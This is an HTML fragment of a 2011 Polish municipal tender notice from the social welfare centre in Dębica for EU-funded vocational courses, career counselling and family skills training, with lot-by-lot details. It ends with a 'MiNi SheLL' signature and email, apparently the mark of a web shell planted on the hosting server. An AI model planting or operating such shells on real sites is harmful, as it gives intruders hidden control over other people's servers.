<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie  o spełnieniu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ), a jeżeli zamawiający żąda dokumentów  potwierdzających spełnianie tych warunków, również te dokumenty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. 
2. Zmiana terminu realizacji przedmiotu zamówienia jest dopuszczalna w wyjątkowych sytuacjach  - jedynie za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny  Ośrodek Pomocy  Społecznej w Dębicy  ,  39-200 Dębica,  ul. Stefana Batorego 13, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2011 godzina 09:00, miejsce: Gminny  Ośrodek Pomocy  Społecznej w Dębicy  ,  39-200 Dębica,  ul. Stefana Batorego 13, Gabinet Kierownika GOPS- pokój nr  8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja projektu systemowego - Czas na aktywność w Gminie Dębica-  współfinansowana jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki , Priorytet VII-Promocja integracji społecznej, Działanie 7.1- Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1- Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Kucharz- ciastkarz dla 10 osób ( 7 kobiet + 3 mężczyzn).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość osób do przeszkolenia : 10 osób ( 7 kobiet + 3 mężczyzn) ,
b) minimalna liczba godzin szkolenia -250 godzin dydaktycznych (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - sierpień - 07 październik 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs koparko -ładowarki dla  10 osób ( 10 mężczyzn).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość osób do przeszkolenia : 10 osób ( 10 mężczyzn) ,
b) minimalna liczba godzin szkolenia -202 godziny  dydaktyczne (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia-  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - lipiec -19 sierpień 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs murarz- tynkarz dla 5 osób ( 5 mężczyzn).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość osób do przeszkolenia : 5 osób ( 5 mężczyzn) ,
b) minimalna liczba godzin szkolenia - 200 godzin dydaktycznych(1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  7 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie 
e) miejsce realizacji szkolenia - miasto Dębica
f) termin realizacji szkolenia - sierpień - 07 październik 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs kosmetyczny z elementami stylizacji paznokci dl 15 osób ( 15 kobiet).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość osób do przeszkolenia : 15 osób ( 15 kobiet ) ,
b) minimalna liczba godzin szkolenia -100 godzin dydaktycznych (1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  6 tygodni
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia- miasto Dębica
f) termin realizacji szkolenia - lipiec - 19 sierpień 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs kelner- barman dla 10 osób (5 kobiet + 5 mężczyzn).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość osób do przeszkolenia : 10 osób ( 5 kobiet + 5 mężczyzn) ,
b) minimalna liczba godzin szkolenia - 120 godzin dydaktycznych(1 godzina dydaktyczna-45 minut)
c) maksymalny okres trwania szkolenia -  4 tygodnie
d) godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
e) miejsce realizacji szkolenia - Dębica
f) termin realizacji szkolenia - październik - 15 listopad 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Doradztwo zawodowe dla 35 osób (25 kobiet + 10 mężczyzn).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - łączna ilość godzin : 37 godzin 
- indywidualne w ilości 1 godziny na 1 osobę przed rozpoczęciem szkoleń, 
- grupowe (Warsztaty Aktywnego Poszukiwania Pracy) w ilości 2 godziny na grupę po zakończeniu szkoleń.

a) ilość osób do przeszkolenia - 35 osób (25 kobiet + 10 mężczyzn)
b) czas trwania szkolenia - przed rozpoczęciem szkoleń 1 godzina i po zakończeniu szkoleń 2 godziny
c) godziny realizacji szkolenia - 8.00 - 16.00 maksymalnie 2 godzin dydaktycznych dziennie
d) miejsce realizacji szkolenia - Dębica
e) termin realizacji szkolenia:  
    -    01- 05 lipiec 2011 r. doradztwo indywidualne, 
    -    01- 10 grudzień 2011 r. doradztwo grupowe

Celem usługi jest zaktywizowanie osób bezrobotnych poprzez podniesienie świadomości w zakresie mechanizmów rynku pracy, dostarczenie kompetencji zawodowych poszukiwanych na lokalnym rynku pracy a w szczególności ;
- kwalifikacja do kursów zawodowych, - podniesienie wiedzy w zakresie mechanizmów i dynamiki rynku pracy, - metody poszukiwania pracy, - zdobycie umiejętności analizy swoich mocnych i słabych stron, -zdobycie umiejętności prowadzenia rozmowy kwalifikacyjnej, -zdobycie umiejętności przygotowania i pisania listu motywacyjnego, życiorysu zawodowego (CV), kwestionariusza osobowego, - poznanie własnych praw związanych z rynkiem pracy.

Wykonawca doradztwa zawodowego zapewnia:
-sprzęt dydaktyczny, -materiały szkoleniowe dla uczestników , -warunki zgodne z przepisami BHP
Wykonawca po  wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. Dopuszcza się możliwość wykonania usługi doradztwa zawodowego  w budynku Urzędu Gminy Dębica na  sali  konferencyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Treningi umiejętności psychospołecznych - trener rodzinny dla 7 rodzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 10 godzin na 1 rodzinę (indywidualne i grupowe) - łączna ilość godzin: 70 godzin; rodzaj treningów i ilość godzin zostanie przeanalizowany i dopasowany przez trenera rodzinnego w trakcie realizacji pod kątem danej rodziny oraz rodzaju problemów, w związku z czym dopuszczalne jest wykonanie usługi w przeliczeniu na 1 rodzinę zarówno - 1 godzina treningów indywidualnych + 9 godzin treningów grupowych jak i  1 godzina treningów grupowych i 9 godzin treningów indywidualnych.
a) ilość rodzin do przeprowadzenia treningów : 7 rodzin
b) czas realizacji szkolenia - od lipca do 30 listopada 2011 r.
c) godziny realizacji - 8.00 - 19.00 maksymalnie 3 godziny dziennie
d) miejsce realizacji - w miejscu zamieszkanie rodzin lub/i w siedzibie Wykonawcy

Celem usługi jest podniesienie kompetencji psychospołecznych rodzin zagrożonych wykluczeniem społecznym a w szczególności: - trening zastępowania agresji, - trening radzenia sobie ze stresem, - trening rozwiązywania sytuacji konfliktowych, - trening komunikacji, - trening umiejętności wychowawczych dla rodziców,  - trening autoprezentacji, wizerunku, budowania autorytetu ;
oraz 
-warsztaty psychospołeczne podnoszące poziom motywacji, - samooceny, - poczucia własnej wartości; -poprawa wizerunku,- komunikacji interpersonalnej, - kształtowania zachowań asertywnych, - radzenia sobie w sytuacjach problemowych, - budowanie wizerunku , autoprezentacja, budowanie autorytetu, - zarządzanie czasem (sobą w czasie), planowanie, organizowanie.

Wykonawca treningów kompetencji psychospołecznych zapewnia:
-sprzęt dydaktyczny, -materiały szkoleniowe dla uczestników , -warunki zgodne z przepisami BHP
Wykonawca po  wykonaniu zadania przedstawi Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com